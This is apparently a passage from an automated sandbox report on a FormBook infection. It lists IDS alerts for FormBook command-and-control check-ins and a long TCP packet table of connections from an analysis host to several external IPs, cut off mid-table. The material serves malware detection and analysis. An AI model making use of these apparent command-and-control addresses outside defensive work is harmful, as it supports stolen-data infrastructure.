                                                                    2025-01-11T08:17:59.919440+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.7499928.218.14.12080TCP
                                                                    2025-01-11T08:18:02.476469+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.7499938.218.14.12080TCP
                                                                    2025-01-11T08:18:08.097844+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749994203.161.43.22880TCP
                                                                    2025-01-11T08:18:10.670064+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749995203.161.43.22880TCP
                                                                    2025-01-11T08:18:13.227092+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749996203.161.43.22880TCP
                                                                    2025-01-11T08:18:15.759713+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749997203.161.43.22880TCP
                                                                    2025-01-11T08:18:21.267075+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74999813.248.169.4880TCP
                                                                    2025-01-11T08:18:23.809027+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74999913.248.169.4880TCP
                                                                    2025-01-11T08:18:26.381532+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.75000013.248.169.4880TCP
                                                                    2025-01-11T08:18:28.913120+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.75000113.248.169.4880TCP
                                                                    2025-01-11T08:18:35.081560+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.750002147.255.21.18780TCP
                                                                    2025-01-11T08:18:37.633844+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.750003147.255.21.18780TCP
                                                                    2025-01-11T08:18:40.173449+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.750004147.255.21.18780TCP
                                                                    2025-01-11T08:18:42.699338+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.750005147.255.21.18780TCP
                                                                    2025-01-11T08:18:49.281777+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.750006104.21.42.7780TCP
                                                                    2025-01-11T08:18:51.841588+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.750007104.21.42.7780TCP

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jan 11, 2025 08:16:41.326632023 CET4997280192.168.2.7154.205.156.26
                                                                    Jan 11, 2025 08:16:41.331582069 CET8049972154.205.156.26192.168.2.7
                                                                    Jan 11, 2025 08:16:41.331705093 CET4997280192.168.2.7154.205.156.26
                                                                    Jan 11, 2025 08:16:41.346120119 CET4997280192.168.2.7154.205.156.26
                                                                    Jan 11, 2025 08:16:41.351067066 CET8049972154.205.156.26192.168.2.7
                                                                    Jan 11, 2025 08:16:42.756397963 CET8049972154.205.156.26192.168.2.7
                                                                    Jan 11, 2025 08:16:42.756463051 CET8049972154.205.156.26192.168.2.7
                                                                    Jan 11, 2025 08:16:42.756658077 CET4997280192.168.2.7154.205.156.26
                                                                    Jan 11, 2025 08:16:42.760262012 CET4997280192.168.2.7154.205.156.26
                                                                    Jan 11, 2025 08:16:42.765117884 CET8049972154.205.156.26192.168.2.7
                                                                    Jan 11, 2025 08:16:58.590704918 CET4997380192.168.2.747.76.213.197
                                                                    Jan 11, 2025 08:16:58.595575094 CET804997347.76.213.197192.168.2.7
                                                                    Jan 11, 2025 08:16:58.595657110 CET4997380192.168.2.747.76.213.197
                                                                    Jan 11, 2025 08:16:58.633883953 CET4997380192.168.2.747.76.213.197
                                                                    Jan 11, 2025 08:16:58.638712883 CET804997347.76.213.197192.168.2.7
                                                                    Jan 11, 2025 08:16:59.497067928 CET804997347.76.213.197192.168.2.7
                                                                    Jan 11, 2025 08:16:59.497143030 CET804997347.76.213.197192.168.2.7
                                                                    Jan 11, 2025 08:16:59.497328043 CET4997380192.168.2.747.76.213.197
                                                                    Jan 11, 2025 08:17:00.153470039 CET4997380192.168.2.747.76.213.197
                                                                    Jan 11, 2025 08:17:01.171983957 CET4997480192.168.2.747.76.213.197
                                                                    Jan 11, 2025 08:17:01.176923990 CET804997447.76.213.197192.168.2.7
                                                                    Jan 11, 2025 08:17:01.177026987 CET4997480192.168.2.747.76.213.197
                                                                    Jan 11, 2025 08:17:01.193464994 CET4997480192.168.2.747.76.213.197
                                                                    Jan 11, 2025 08:17:01.198215961 CET804997447.76.213.197192.168.2.7
                                                                    Jan 11, 2025 08:17:02.077461958 CET804997447.76.213.197192.168.2.7
                                                                    Jan 11, 2025 08:17:02.081444979 CET804997447.76.213.197192.168.2.7
                                                                    Jan 11, 2025 08:17:02.081515074 CET4997480192.168.2.747.76.213.197
                                                                    Jan 11, 2025 08:17:02.700201035 CET4997480192.168.2.747.76.213.197
                                                                    Jan 11, 2025 08:17:03.718796968 CET4997680192.168.2.747.76.213.197
                                                                    Jan 11, 2025 08:17:03.724081039 CET804997647.76.213.197192.168.2.7
                                                                    Jan 11, 2025 08:17:03.724198103 CET4997680192.168.2.747.76.213.197
                                                                    Jan 11, 2025 08:17:03.739660025 CET4997680192.168.2.747.76.213.197
                                                                    Jan 11, 2025 08:17:03.744621038 CET804997647.76.213.197192.168.2.7
                                                                    Jan 11, 2025 08:17:03.744692087 CET804997647.76.213.197192.168.2.7
                                                                    Jan 11, 2025 08:17:04.638664007 CET804997647.76.213.197192.168.2.7
                                                                    Jan 11, 2025 08:17:04.638742924 CET804997647.76.213.197192.168.2.7
                                                                    Jan 11, 2025 08:17:04.638978004 CET4997680192.168.2.747.76.213.197
                                                                    Jan 11, 2025 08:17:05.247131109 CET4997680192.168.2.747.76.213.197
                                                                    Jan 11, 2025 08:17:06.265897989 CET4997780192.168.2.747.76.213.197
                                                                    Jan 11, 2025 08:17:06.270912886 CET804997747.76.213.197192.168.2.7
                                                                    Jan 11, 2025 08:17:06.271002054 CET4997780192.168.2.747.76.213.197
                                                                    Jan 11, 2025 08:17:06.281265974 CET4997780192.168.2.747.76.213.197
                                                                    Jan 11, 2025 08:17:06.286174059 CET804997747.76.213.197192.168.2.7
                                                                    Jan 11, 2025 08:17:07.188996077 CET804997747.76.213.197192.168.2.7
                                                                    Jan 11, 2025 08:17:07.189119101 CET804997747.76.213.197192.168.2.7
                                                                    Jan 11, 2025 08:17:07.189291954 CET4997780192.168.2.747.76.213.197
                                                                    Jan 11, 2025 08:17:07.191464901 CET4997780192.168.2.747.76.213.197
                                                                    Jan 11, 2025 08:17:07.196377993 CET804997747.76.213.197192.168.2.7
                                                                    Jan 11, 2025 08:17:12.714704037 CET4997880192.168.2.774.48.143.82
                                                                    Jan 11, 2025 08:17:12.719677925 CET804997874.48.143.82192.168.2.7
                                                                    Jan 11, 2025 08:17:12.719774008 CET4997880192.168.2.774.48.143.82
                                                                    Jan 11, 2025 08:17:12.735057116 CET4997880192.168.2.774.48.143.82
                                                                    Jan 11, 2025 08:17:12.739936113 CET804997874.48.143.82192.168.2.7
                                                                    Jan 11, 2025 08:17:13.306324959 CET804997874.48.143.82192.168.2.7
                                                                    Jan 11, 2025 08:17:13.306370020 CET804997874.48.143.82192.168.2.7
                                                                    Jan 11, 2025 08:17:13.306408882 CET804997874.48.143.82192.168.2.7
                                                                    Jan 11, 2025 08:17:13.306462049 CET4997880192.168.2.774.48.143.82
                                                                    Jan 11, 2025 08:17:13.306510925 CET4997880192.168.2.774.48.143.82
                                                                    Jan 11, 2025 08:17:14.247122049 CET4997880192.168.2.774.48.143.82
                                                                    Jan 11, 2025 08:17:15.265858889 CET4997980192.168.2.774.48.143.82
                                                                    Jan 11, 2025 08:17:15.270994902 CET804997974.48.143.82192.168.2.7
                                                                    Jan 11, 2025 08:17:15.271112919 CET4997980192.168.2.774.48.143.82
                                                                    Jan 11, 2025 08:17:15.291090965 CET4997980192.168.2.774.48.143.82
                                                                    Jan 11, 2025 08:17:15.295993090 CET804997974.48.143.82192.168.2.7
                                                                    Jan 11, 2025 08:17:15.867742062 CET804997974.48.143.82192.168.2.7
                                                                    Jan 11, 2025 08:17:15.867795944 CET804997974.48.143.82192.168.2.7
                                                                    Jan 11, 2025 08:17:15.867829084 CET804997974.48.143.82192.168.2.7
                                                                    Jan 11, 2025 08:17:15.868025064 CET4997980192.168.2.774.48.143.82
                                                                    Jan 11, 2025 08:17:15.868026018 CET4997980192.168.2.774.48.143.82
                                                                    Jan 11, 2025 08:17:16.794217110 CET4997980192.168.2.774.48.143.82
                                                                    Jan 11, 2025 08:17:17.812572956 CET4998080192.168.2.774.48.143.82
                                                                    Jan 11, 2025 08:17:17.817533016 CET804998074.48.143.82192.168.2.7
                                                                    Jan 11, 2025 08:17:17.817632914 CET4998080192.168.2.774.48.143.82
                                                                    Jan 11, 2025 08:17:17.833518028 CET4998080192.168.2.774.48.143.82
                                                                    Jan 11, 2025 08:17:17.838561058 CET804998074.48.143.82192.168.2.7
                                                                    Jan 11, 2025 08:17:17.838664055 CET804998074.48.143.82192.168.2.7
                                                                    Jan 11, 2025 08:17:18.395745993 CET804998074.48.143.82192.168.2.7
                                                                    Jan 11, 2025 08:17:18.395800114 CET804998074.48.143.82192.168.2.7
                                                                    Jan 11, 2025 08:17:18.395840883 CET804998074.48.143.82192.168.2.7
                                                                    Jan 11, 2025 08:17:18.395884037 CET4998080192.168.2.774.48.143.82
                                                                    Jan 11, 2025 08:17:18.395915985 CET4998080192.168.2.774.48.143.82
                                                                    Jan 11, 2025 08:17:19.340950966 CET4998080192.168.2.774.48.143.82
                                                                    Jan 11, 2025 08:17:20.359544992 CET4998180192.168.2.774.48.143.82
                                                                    Jan 11, 2025 08:17:20.364562035 CET804998174.48.143.82192.168.2.7
                                                                    Jan 11, 2025 08:17:20.368098974 CET4998180192.168.2.774.48.143.82
                                                                    Jan 11, 2025 08:17:20.377585888 CET4998180192.168.2.774.48.143.82
                                                                    Jan 11, 2025 08:17:20.382441998 CET804998174.48.143.82192.168.2.7
                                                                    Jan 11, 2025 08:17:20.955022097 CET804998174.48.143.82192.168.2.7
                                                                    Jan 11, 2025 08:17:20.955048084 CET804998174.48.143.82192.168.2.7
                                                                    Jan 11, 2025 08:17:20.955064058 CET804998174.48.143.82192.168.2.7
                                                                    Jan 11, 2025 08:17:20.955303907 CET4998180192.168.2.774.48.143.82
                                                                    Jan 11, 2025 08:17:20.958441973 CET4998180192.168.2.774.48.143.82
                                                                    Jan 11, 2025 08:17:20.963238955 CET804998174.48.143.82192.168.2.7
                                                                    Jan 11, 2025 08:17:25.984579086 CET4998280192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:17:25.989561081 CET804998213.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:17:25.989698887 CET4998280192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:17:26.007778883 CET4998280192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:17:26.012681961 CET804998213.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:17:26.455938101 CET804998213.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:17:26.456007957 CET804998213.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:17:26.456079006 CET4998280192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:17:27.512804031 CET4998280192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:17:28.531539917 CET4998380192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:17:28.536472082 CET804998313.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:17:28.536560059 CET4998380192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:17:28.553397894 CET4998380192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:17:28.558332920 CET804998313.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:17:29.005220890 CET804998313.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:17:29.005734921 CET804998313.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:17:29.005832911 CET4998380192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:17:30.059751987 CET4998380192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:17:31.078135014 CET4998480192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:17:31.083020926 CET804998413.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:17:31.083116055 CET4998480192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:17:31.098731995 CET4998480192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:17:31.103615999 CET804998413.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:17:31.103698015 CET804998413.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:17:31.571757078 CET804998413.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:17:31.571851015 CET804998413.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:17:31.571928024 CET4998480192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:17:32.606813908 CET4998480192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:17:33.624988079 CET4998580192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:17:33.630143881 CET804998513.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:17:33.630297899 CET4998580192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:17:33.639498949 CET4998580192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:17:33.644377947 CET804998513.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:17:34.103887081 CET804998513.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:17:34.103957891 CET804998513.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:17:34.104110956 CET4998580192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:17:34.106897116 CET4998580192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:17:34.111768961 CET804998513.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:17:39.396564007 CET4998680192.168.2.7103.21.221.87
                                                                    Jan 11, 2025 08:17:39.401462078 CET8049986103.21.221.87192.168.2.7
                                                                    Jan 11, 2025 08:17:39.401554108 CET4998680192.168.2.7103.21.221.87
                                                                    Jan 11, 2025 08:17:39.417825937 CET4998680192.168.2.7103.21.221.87
                                                                    Jan 11, 2025 08:17:39.422740936 CET8049986103.21.221.87192.168.2.7
                                                                    Jan 11, 2025 08:17:40.319107056 CET8049986103.21.221.87192.168.2.7
                                                                    Jan 11, 2025 08:17:40.319185972 CET8049986103.21.221.87192.168.2.7
                                                                    Jan 11, 2025 08:17:40.319272995 CET4998680192.168.2.7103.21.221.87
                                                                    Jan 11, 2025 08:17:40.919433117 CET4998680192.168.2.7103.21.221.87
                                                                    Jan 11, 2025 08:17:41.937740088 CET4998780192.168.2.7103.21.221.87
                                                                    Jan 11, 2025 08:17:41.942723036 CET8049987103.21.221.87192.168.2.7
                                                                    Jan 11, 2025 08:17:41.942841053 CET4998780192.168.2.7103.21.221.87
                                                                    Jan 11, 2025 08:17:41.958693027 CET4998780192.168.2.7103.21.221.87
                                                                    Jan 11, 2025 08:17:41.963598013 CET8049987103.21.221.87192.168.2.7
                                                                    Jan 11, 2025 08:17:42.840620995 CET8049987103.21.221.87192.168.2.7
                                                                    Jan 11, 2025 08:17:42.840712070 CET8049987103.21.221.87192.168.2.7
                                                                    Jan 11, 2025 08:17:42.840779066 CET4998780192.168.2.7103.21.221.87
                                                                    Jan 11, 2025 08:17:43.465991020 CET4998780192.168.2.7103.21.221.87
                                                                    Jan 11, 2025 08:17:44.484406948 CET4998880192.168.2.7103.21.221.87
                                                                    Jan 11, 2025 08:17:44.489655972 CET8049988103.21.221.87192.168.2.7
                                                                    Jan 11, 2025 08:17:44.489795923 CET4998880192.168.2.7103.21.221.87
                                                                    Jan 11, 2025 08:17:44.505649090 CET4998880192.168.2.7103.21.221.87
                                                                    Jan 11, 2025 08:17:44.510588884 CET8049988103.21.221.87192.168.2.7
                                                                    Jan 11, 2025 08:17:44.510704994 CET8049988103.21.221.87192.168.2.7
                                                                    Jan 11, 2025 08:17:45.391906023 CET8049988103.21.221.87192.168.2.7
                                                                    Jan 11, 2025 08:17:45.391949892 CET8049988103.21.221.87192.168.2.7
                                                                    Jan 11, 2025 08:17:45.392008066 CET4998880192.168.2.7103.21.221.87
                                                                    Jan 11, 2025 08:17:46.012841940 CET4998880192.168.2.7103.21.221.87
                                                                    Jan 11, 2025 08:17:47.033396006 CET4998980192.168.2.7103.21.221.87
                                                                    Jan 11, 2025 08:17:47.038341045 CET8049989103.21.221.87192.168.2.7
                                                                    Jan 11, 2025 08:17:47.038418055 CET4998980192.168.2.7103.21.221.87
                                                                    Jan 11, 2025 08:17:47.048573017 CET4998980192.168.2.7103.21.221.87
                                                                    Jan 11, 2025 08:17:47.053507090 CET8049989103.21.221.87192.168.2.7
                                                                    Jan 11, 2025 08:17:48.016223907 CET8049989103.21.221.87192.168.2.7
                                                                    Jan 11, 2025 08:17:48.016320944 CET8049989103.21.221.87192.168.2.7
                                                                    Jan 11, 2025 08:17:48.016406059 CET4998980192.168.2.7103.21.221.87
                                                                    Jan 11, 2025 08:17:48.019162893 CET4998980192.168.2.7103.21.221.87
                                                                    Jan 11, 2025 08:17:48.024425030 CET8049989103.21.221.87192.168.2.7
                                                                    Jan 11, 2025 08:17:53.719830990 CET4999080192.168.2.78.218.14.120
                                                                    Jan 11, 2025 08:17:53.724771023 CET80499908.218.14.120192.168.2.7
                                                                    Jan 11, 2025 08:17:53.724869967 CET4999080192.168.2.78.218.14.120
                                                                    Jan 11, 2025 08:17:53.745992899 CET4999080192.168.2.78.218.14.120
                                                                    Jan 11, 2025 08:17:53.751000881 CET80499908.218.14.120192.168.2.7
                                                                    Jan 11, 2025 08:17:54.627358913 CET80499908.218.14.120192.168.2.7
                                                                    Jan 11, 2025 08:17:54.627398968 CET80499908.218.14.120192.168.2.7
                                                                    Jan 11, 2025 08:17:54.627542973 CET4999080192.168.2.78.218.14.120
                                                                    Jan 11, 2025 08:17:55.262913942 CET4999080192.168.2.78.218.14.120
                                                                    Jan 11, 2025 08:17:56.333071947 CET4999180192.168.2.78.218.14.120
                                                                    Jan 11, 2025 08:17:56.338093042 CET80499918.218.14.120192.168.2.7
                                                                    Jan 11, 2025 08:17:56.338258982 CET4999180192.168.2.78.218.14.120
                                                                    Jan 11, 2025 08:17:56.477174997 CET4999180192.168.2.78.218.14.120
                                                                    Jan 11, 2025 08:17:56.482141018 CET80499918.218.14.120192.168.2.7
                                                                    Jan 11, 2025 08:17:57.228091002 CET80499918.218.14.120192.168.2.7
                                                                    Jan 11, 2025 08:17:57.228255033 CET80499918.218.14.120192.168.2.7
                                                                    Jan 11, 2025 08:17:57.228313923 CET4999180192.168.2.78.218.14.120
                                                                    Jan 11, 2025 08:17:57.981693029 CET4999180192.168.2.78.218.14.120
                                                                    Jan 11, 2025 08:17:59.016417980 CET4999280192.168.2.78.218.14.120
                                                                    Jan 11, 2025 08:17:59.021482944 CET80499928.218.14.120192.168.2.7
                                                                    Jan 11, 2025 08:17:59.021575928 CET4999280192.168.2.78.218.14.120
                                                                    Jan 11, 2025 08:17:59.051192999 CET4999280192.168.2.78.218.14.120
                                                                    Jan 11, 2025 08:17:59.056221962 CET80499928.218.14.120192.168.2.7
                                                                    Jan 11, 2025 08:17:59.056288958 CET80499928.218.14.120192.168.2.7
                                                                    Jan 11, 2025 08:17:59.919323921 CET80499928.218.14.120192.168.2.7
                                                                    Jan 11, 2025 08:17:59.919352055 CET80499928.218.14.120192.168.2.7
                                                                    Jan 11, 2025 08:17:59.919440031 CET4999280192.168.2.78.218.14.120
                                                                    Jan 11, 2025 08:18:00.559870005 CET4999280192.168.2.78.218.14.120
                                                                    Jan 11, 2025 08:18:01.578720093 CET4999380192.168.2.78.218.14.120
                                                                    Jan 11, 2025 08:18:01.583621979 CET80499938.218.14.120192.168.2.7
                                                                    Jan 11, 2025 08:18:01.583715916 CET4999380192.168.2.78.218.14.120
                                                                    Jan 11, 2025 08:18:01.593446970 CET4999380192.168.2.78.218.14.120
                                                                    Jan 11, 2025 08:18:01.598299980 CET80499938.218.14.120192.168.2.7
                                                                    Jan 11, 2025 08:18:02.476223946 CET80499938.218.14.120192.168.2.7
                                                                    Jan 11, 2025 08:18:02.476265907 CET80499938.218.14.120192.168.2.7
                                                                    Jan 11, 2025 08:18:02.476469040 CET4999380192.168.2.78.218.14.120
                                                                    Jan 11, 2025 08:18:02.479099035 CET4999380192.168.2.78.218.14.120
                                                                    Jan 11, 2025 08:18:02.483993053 CET80499938.218.14.120192.168.2.7
                                                                    Jan 11, 2025 08:18:07.499998093 CET4999480192.168.2.7203.161.43.228
                                                                    Jan 11, 2025 08:18:07.504822016 CET8049994203.161.43.228192.168.2.7
                                                                    Jan 11, 2025 08:18:07.504929066 CET4999480192.168.2.7203.161.43.228
                                                                    Jan 11, 2025 08:18:07.520422935 CET4999480192.168.2.7203.161.43.228
                                                                    Jan 11, 2025 08:18:07.525248051 CET8049994203.161.43.228192.168.2.7
                                                                    Jan 11, 2025 08:18:08.097700119 CET8049994203.161.43.228192.168.2.7
                                                                    Jan 11, 2025 08:18:08.097749949 CET8049994203.161.43.228192.168.2.7
                                                                    Jan 11, 2025 08:18:08.097843885 CET4999480192.168.2.7203.161.43.228
                                                                    Jan 11, 2025 08:18:09.028676987 CET4999480192.168.2.7203.161.43.228
                                                                    Jan 11, 2025 08:18:10.047323942 CET4999580192.168.2.7203.161.43.228
                                                                    Jan 11, 2025 08:18:10.052664042 CET8049995203.161.43.228192.168.2.7
                                                                    Jan 11, 2025 08:18:10.052757025 CET4999580192.168.2.7203.161.43.228
                                                                    Jan 11, 2025 08:18:10.068294048 CET4999580192.168.2.7203.161.43.228
                                                                    Jan 11, 2025 08:18:10.073271990 CET8049995203.161.43.228192.168.2.7
                                                                    Jan 11, 2025 08:18:10.669715881 CET8049995203.161.43.228192.168.2.7
                                                                    Jan 11, 2025 08:18:10.669955969 CET8049995203.161.43.228192.168.2.7
                                                                    Jan 11, 2025 08:18:10.670063972 CET4999580192.168.2.7203.161.43.228
                                                                    Jan 11, 2025 08:18:11.575432062 CET4999580192.168.2.7203.161.43.228
                                                                    Jan 11, 2025 08:18:12.594139099 CET4999680192.168.2.7203.161.43.228
                                                                    Jan 11, 2025 08:18:12.599030018 CET8049996203.161.43.228192.168.2.7
                                                                    Jan 11, 2025 08:18:12.599159002 CET4999680192.168.2.7203.161.43.228
                                                                    Jan 11, 2025 08:18:12.615262985 CET4999680192.168.2.7203.161.43.228
                                                                    Jan 11, 2025 08:18:12.620203972 CET8049996203.161.43.228192.168.2.7
                                                                    Jan 11, 2025 08:18:12.620306015 CET8049996203.161.43.228192.168.2.7
                                                                    Jan 11, 2025 08:18:13.226315022 CET8049996203.161.43.228192.168.2.7
                                                                    Jan 11, 2025 08:18:13.227020025 CET8049996203.161.43.228192.168.2.7
                                                                    Jan 11, 2025 08:18:13.227092028 CET4999680192.168.2.7203.161.43.228
                                                                    Jan 11, 2025 08:18:14.122298002 CET4999680192.168.2.7203.161.43.228
                                                                    Jan 11, 2025 08:18:15.141362906 CET4999780192.168.2.7203.161.43.228
                                                                    Jan 11, 2025 08:18:15.146302938 CET8049997203.161.43.228192.168.2.7
                                                                    Jan 11, 2025 08:18:15.146481991 CET4999780192.168.2.7203.161.43.228
                                                                    Jan 11, 2025 08:18:15.156759977 CET4999780192.168.2.7203.161.43.228
                                                                    Jan 11, 2025 08:18:15.161714077 CET8049997203.161.43.228192.168.2.7
                                                                    Jan 11, 2025 08:18:15.759304047 CET8049997203.161.43.228192.168.2.7
                                                                    Jan 11, 2025 08:18:15.759443045 CET8049997203.161.43.228192.168.2.7
                                                                    Jan 11, 2025 08:18:15.759712934 CET4999780192.168.2.7203.161.43.228
                                                                    Jan 11, 2025 08:18:15.762191057 CET4999780192.168.2.7203.161.43.228
                                                                    Jan 11, 2025 08:18:15.767066002 CET8049997203.161.43.228192.168.2.7
                                                                    Jan 11, 2025 08:18:20.790323019 CET4999880192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:18:20.795336008 CET804999813.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:18:20.795447111 CET4999880192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:18:20.810429096 CET4999880192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:18:20.815409899 CET804999813.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:18:21.266819954 CET804999813.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:18:21.266949892 CET804999813.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:18:21.267075062 CET4999880192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:18:22.325561047 CET4999880192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:18:23.344351053 CET4999980192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:18:23.351661921 CET804999913.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:18:23.351789951 CET4999980192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:18:23.367479086 CET4999980192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:18:23.372359037 CET804999913.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:18:23.808835983 CET804999913.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:18:23.808896065 CET804999913.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:18:23.809026957 CET4999980192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:18:24.872384071 CET4999980192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:18:25.892127991 CET5000080192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:18:25.897181988 CET805000013.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:18:25.897334099 CET5000080192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:18:25.913553953 CET5000080192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:18:25.918644905 CET805000013.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:18:25.918791056 CET805000013.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:18:26.381391048 CET805000013.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:18:26.381450891 CET805000013.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:18:26.381531954 CET5000080192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:18:27.419596910 CET5000080192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:18:28.437974930 CET5000180192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:18:28.443068027 CET805000113.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:18:28.443197012 CET5000180192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:18:28.453018904 CET5000180192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:18:28.457828999 CET805000113.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:18:28.912782907 CET805000113.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:18:28.912861109 CET805000113.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:18:28.913120031 CET5000180192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:18:28.915714025 CET5000180192.168.2.713.248.169.48
                                                                    Jan 11, 2025 08:18:28.920644045 CET805000113.248.169.48192.168.2.7
                                                                    Jan 11, 2025 08:18:34.473964930 CET5000280192.168.2.7147.255.21.187
                                                                    Jan 11, 2025 08:18:34.478782892 CET8050002147.255.21.187192.168.2.7
                                                                    Jan 11, 2025 08:18:34.478880882 CET5000280192.168.2.7147.255.21.187
                                                                    Jan 11, 2025 08:18:34.494033098 CET5000280192.168.2.7147.255.21.187
                                                                    Jan 11, 2025 08:18:34.498816967 CET8050002147.255.21.187192.168.2.7
                                                                    Jan 11, 2025 08:18:35.081433058 CET8050002147.255.21.187192.168.2.7
                                                                    Jan 11, 2025 08:18:35.081456900 CET8050002147.255.21.187192.168.2.7
                                                                    Jan 11, 2025 08:18:35.081559896 CET5000280192.168.2.7147.255.21.187
                                                                    Jan 11, 2025 08:18:35.997405052 CET5000280192.168.2.7147.255.21.187
                                                                    Jan 11, 2025 08:18:37.016028881 CET5000380192.168.2.7147.255.21.187
                                                                    Jan 11, 2025 08:18:37.022555113 CET8050003147.255.21.187192.168.2.7
                                                                    Jan 11, 2025 08:18:37.022703886 CET5000380192.168.2.7147.255.21.187
                                                                    Jan 11, 2025 08:18:37.038695097 CET5000380192.168.2.7147.255.21.187
                                                                    Jan 11, 2025 08:18:37.045150995 CET8050003147.255.21.187192.168.2.7
                                                                    Jan 11, 2025 08:18:37.633712053 CET8050003147.255.21.187192.168.2.7
                                                                    Jan 11, 2025 08:18:37.633738995 CET8050003147.255.21.187192.168.2.7
                                                                    Jan 11, 2025 08:18:37.633843899 CET5000380192.168.2.7147.255.21.187
                                                                    Jan 11, 2025 08:18:38.544375896 CET5000380192.168.2.7147.255.21.187
                                                                    Jan 11, 2025 08:18:39.563002110 CET5000480192.168.2.7147.255.21.187
                                                                    Jan 11, 2025 08:18:39.568142891 CET8050004147.255.21.187192.168.2.7
                                                                    Jan 11, 2025 08:18:39.568304062 CET5000480192.168.2.7147.255.21.187
                                                                    Jan 11, 2025 08:18:39.584207058 CET5000480192.168.2.7147.255.21.187
                                                                    Jan 11, 2025 08:18:39.589138985 CET8050004147.255.21.187192.168.2.7
                                                                    Jan 11, 2025 08:18:39.589193106 CET8050004147.255.21.187192.168.2.7
                                                                    Jan 11, 2025 08:18:40.173273087 CET8050004147.255.21.187192.168.2.7
                                                                    Jan 11, 2025 08:18:40.173382044 CET8050004147.255.21.187192.168.2.7
                                                                    Jan 11, 2025 08:18:40.173449039 CET5000480192.168.2.7147.255.21.187
